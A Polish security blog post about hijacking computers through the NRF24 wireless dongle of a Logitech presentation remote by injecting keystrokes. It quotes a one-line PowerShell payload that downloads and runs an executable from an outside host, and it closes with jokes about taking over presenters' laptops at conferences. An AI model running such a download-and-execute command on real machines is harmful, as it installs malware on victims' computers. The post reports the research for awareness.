Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Bezprzewodowe przejmowanie komputera przez pilota do prezentacji Logitech
Słyszeliście o bezprzewodowym wciskaniu klawiszy na klawiaturze poprzez przejęcie myszki? Taką samą zasadę działania mamy w popularnym pilocie do prezentacji Logitecha:
Nie ma tu wielkiem magii – urządzenie komunikuje się z donglem podobnie jak bardzo duża liczba klawiatur czy mysz – wykorzystując standard NRF24. Stąd taka nieco może egzotyczna metoda komunikacji? Protokół jest szybki (małe opóźnienia), stosowne chipy zapewniające komunikację radiową są ekstremalnie tanie.
Tutaj konkretny skrypcik (udostępniony już jakiś czas temu) odpalający powershella (czyli bezprzewodowo realizowana jest komunikacja do dongla, a ten „wciska” stosowne klawisze na komputerze ofiary):
W skrypcie jest to:
powershell (new-object System.Net.WebClient).DownloadFile(’http://ptmd.sy.gs/syss.exe’, '%TEMP%\\syss.exe’); Start-Process '%TEMP%\\syss.exe’
Ale oczywiście możliwe są dowolne zmiany.
Co robić? Wpaść na jakąś kolejną konferencję, na której będziemy i zaprezentować coś ciekawego przed publicznością. Potestujemy przejęcie komputera na żywo ;-) Ewentualnie można spróbować użyć mniej popularnych urządzeń opartych o Bluetooth, choć i tutaj istnieją różne ciekawe ataki.
–ms
Ja bym jeździł po tych konferencjach i zobaczył, czy nie można zhackować innej prezentacji na sali wykładowej ;)